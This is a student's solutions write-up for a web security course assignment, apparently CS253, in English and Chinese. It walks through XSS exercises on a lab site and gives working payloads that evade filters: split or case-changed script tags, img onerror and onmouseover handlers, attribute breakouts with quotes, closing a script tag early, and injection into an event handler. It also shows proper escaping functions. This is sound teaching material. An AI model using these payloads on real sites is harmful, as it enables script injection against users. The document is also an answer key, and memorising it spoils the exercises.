Assignments1 Solutions

--- title: Assignments1 Solutions tags: cs253 --- You may need these: - [XSS Filter Evasion Cheat Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet) - :warning: [強國人作業心得](https://blog.csdn.net/qq_41170946/article/details/105410428) :warning: ## XSS INTO HTML TAGS **Exercise 1 – A Truly Disruptive Startup** ```javascript <script>success()</script> ``` **Exercise 2 – No Script Allowed** - hint: [XSS: Beating HTML Sanitizing Filters](https://portswigger.net/support/xss-beating-html-sanitizing-filters) ```javascript <scrscriptipt>success()</script> ``` **Exercise 3 – One More Time, Like You Mean It** - 提示同上題 - 使用 greedy 也只不過對 </script> 做消毒，還是逃不過 script in script ```javascript <scr ipt>success()</scr ipt> ``` **Exercise 4 – An Open-and-Shut Case** - 忘記無視大小寫了，調整大小寫攻破 ```javascript <SCRIPT>success()</SCRIPT> ``` **Exercise 5 – Time to Mix Things Up** - 只預防了全大寫的 case，那就只改變一個字母 ```javascript <sCript>success()</sCript> ``` **Exercise 6 – A Picture is Worth a Thousand Words** - 找別的不使用 `<script>` 的方法了 - 參考 [xss-filter-evasion-cheatsheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet) - 有 onerror, onload, onmouseover 的屬性可搭配別的 tag 使用 - 嘗試 onerror，當 img 載入失敗時呼叫 ```javascript <IMG SRC=/ onerror="success()"></img> ``` **Exercise 7 – Between a Rock And a Hard Place** - `q = q.replace(/script|onerror=|onload=/gi, '')` - 看起來只防止了 onerror 與 onload ```javascript <a onmouseover="success()"/> ``` **Exercise 8 – Angle of Death** - 看起來只對 Angle 做消毒，且只做了一次！重複它、用 onerror 攻破 ```javascript <<IMG SRC=/ onerror="success()"</img> ``` **Exercise 9 – All in a Day's Work** - 一個大招總結，**HTML TAGS** 的攻擊 ```javascript function htmlElementEscape (str) { return str // This is not for security, but because '&' is the HTML escape character // and we don't want the user's input to be treated as an escape sequence. .replace(/&/g, '&') // Without the '<' character, no HTML tags an be created. .replace(/</g, '<') } ``` ## XSS INTO HTML ATTRIBUTES > 發現對手實作了新功能，將 use input 直接原封不動放到 attribute 裡面。 > > 看來可以搞鬼了:ghost: **Exercise 10 – In the Wrong Place at the**Wrong Time - 在最前面用 " 就跳脫了 - `<SCRIPT>success()</SCRIPT>` 不會成功 - 原因是我們把攻擊藏在 HTML attribute 中、而不是 element 裡 - 所以直接考慮 attribute 注入的方式就好 ***works*** ```javascript " onerror="success()" ``` ```javascript "<img src=/ onerror="success()" /> ``` ***failed*** ```javascript <SCRIPT>success()</SCRIPT> ``` **Exercise 11 – You Can't Win 'em All** - 傻 B 只取代一次，給開司兩個引號，就能攻擊成功 ```javascript "" onerror="success()" ``` ```javascript "" onload="success()" ``` **Exercise 12 – When All is Said and Done** - 現在 double quotes 逃脫已被破解，嘗試不用 double quotes 的攻擊 - [`onload()`](https://www.w3schools.com/jsref/event_onload.asp) 的功能好像比較萬用 ***works*** ```javascript ' onload=success() ``` ```javascript ' onload='success()' ``` ***failed*** ```javascript ' onerror=success() ``` **Exercise 13 – When You Want a Job Done Right** - 偷偷發現跳脫的 function 怎麼寫，以及使用方法，都已正確的跳脫 user data - 沒法子了，該讓腎了 ```javascript function htmlAttributeEscape (str) { return str // This is not for security, but because '&' is the HTML escape character // and we don't want the user's input to be treated as an escape sequence. .replace(/&/g, '&') // Without the single quote character, the attacker cannot escape from // inside a single-quoted HTML attribute. .replace(/'/g, ''') // Without the double quote character, the attacker cannot escape from // inside a double-quoted HTML attribute. .replace(/"/g, '"') } ``` **Exercise 14 – Here Today and Gone Tomorrow** - 在 URL 上惡搞吧，看看亂輸入語言會發生什麼事 ![](https://i.imgur.com/vVlKESb.png) - 檢視一下網頁原始碼 ![](https://i.imgur.com/BYK1H1k.png) - 看來可以惡搞了，直接 inject 一個 onload 看看 ![](https://i.imgur.com/Xtafrhc.png) - Great! 成功 **Answer**: `http://caloogle.xyz:4140/search?q=jgdjsetje&lang=en%20onload=success()` ## XSS INTO `<SCRIPT>` TAGS **Exercise 15 – The Early Bird Catches the Worm** - 在 search input 裡亂打，找一下 user input 有沒有被擺在危險的地方 ![](https://i.imgur.com/fsTGRLn.png) - 找到底下的 `q='asgwsrw'` 可以利用，那就直接幫它的 `<script>` 做個結尾元素吧 **works** ```javascript </script> <img src=/ onerror=success() /> <script> ``` ```javascript </script> <body onload=success() /> <script> ``` **Exercise 16 – Tying Up Loose Ends** - 嘗試著用 Regex 取代掉 `</` 字元，那我就在 `</` 中塞入 `</` 變成 `<<//` 試試看 **works** `<<//script> <body onload=success() /> <script>` ## XSS INTO EVENT HANDLER **Exercise 17 – Take a Page Out of Their Book** - [`onmouse`](https://www.w3schools.com/jsref/event_onmouseover.asp) 裡面放的是 script，主動給個分號然後加你要的 script 吧 go to F12 devtool ```! window.fetch('/comment', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({text: 'http://google.com', id: "1);success("}) }).then((resp)=> resp.json()) .then(data=>{console.log(data)}) ``` ## CONGRATS **Exercise 18 – A Penny For Your Thoughts**